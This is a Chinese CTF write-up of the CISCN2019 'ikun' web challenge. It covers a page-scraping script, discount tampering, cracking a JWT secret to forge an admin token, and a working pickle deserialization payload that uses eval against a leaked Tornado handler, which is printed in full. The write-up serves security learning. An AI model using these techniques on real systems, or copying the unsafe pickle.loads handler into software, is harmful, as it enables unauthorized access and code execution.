[CISCN2019 华北赛区 Day1 Web2]ikun

---

前言

今天是2023.9.5，记录开学学习CTF的第二天。之所以选择这道ikun，还是因为羊城杯2023出了一个pickle反序列化，遗憾没做出来。这道题涉及到很多知识点，很值得记录（毕竟还是来点难题才能提升自己）

---

知识点

1. pickle反序列化
2. JWT加解密与密钥
3. js前端代码

---

解题过程

打开题目，发现提示我们要购买到六级
大概翻了一下，没什么收获
不过页面数是通过./shop?page=传参得到
同时查看源代码可以发现，图片有对应的参数值
那么我们可以通过脚本来找到能购买六级的页数

import requests
re = requests.session()
url = "http://03f45ad8-852f-42bb-9af0-391a9b8afe23.node4.buuoj.cn:81/shop?page="
for i in range(0,1000):
    req = re.get(url+str(i))
    if "lv6.png" in req.text:
        print(i)
        break

运行结果为181
那么我们直接访问/shop?page=181
要购买的话得先登录，那么我们随机注册下

问题来了，我们不够钱买
我们抓包试试可不可以修改折扣

改成很小的值，成功购买
但是只允许admin用户访问（可以去试试注册admin，发现不行）

我们观察到http请求中出现jwt数据
我们将它复制到在线解码网站
不难发现用户名是我们注册的
如果我们将用户名改为admin同时生成jwt数据，我们必须要知道密钥
这里用到工具c-jwt-cracker暴力破解（我的是装在kali）
得到密钥1Kun

我们再抓包一下，将jwt数据修改一下
成功后，发现有源码泄露
下载下来，打开www\sshop\views\admin.py
源代码

import tornado.web
from sshop.base import BaseHandler
import pickle
import urllib


class AdminHandler(BaseHandler):
    @tornado.web.authenticated
    def get(self, *args, **kwargs):
        if self.current_user == "admin":
            return self.render('form.html', res='This is Black Technology!', member=0)
        else:
            return self.render('no_ass.html')

    @tornado.web.authenticated
    def post(self, *args, **kwargs):
        try:
            become = self.get_argument('become')
            p = pickle.loads(urllib.unquote(become))
            return self.render('form.html', res=p, member=1)
        except:
            return self.render('form.html', res='This is Black Technology!', member=0)

可以发现是pickle反序列化
我们点击下成为大会员，同时抓包
发现存在可控参数become，这样我们可以上传命令
payload脚本

import pickle
import urllib.parse
class payload(object):
    def __reduce__(self):
       return (eval, ("open('/flag.txt').read()",))
a = pickle.dumps(payload(),protocol=0)  #python3的写法
print(urllib.parse.quote(a))

将脚本运行后的结果上传
得到flag